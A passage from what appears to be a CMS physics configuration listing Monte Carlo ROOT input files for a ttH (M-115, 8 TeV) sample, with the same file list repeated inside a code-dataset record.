'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root',
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root' ] );
secFiles.extend( [
] )
|
flexible
|
{
"blob_id": "965bb4c8e7d6650dab7f002645dceacab59a0c5c",
"index": 7298,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nreadFiles.extend([\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'\n ])\nsecFiles.extend([])\n",
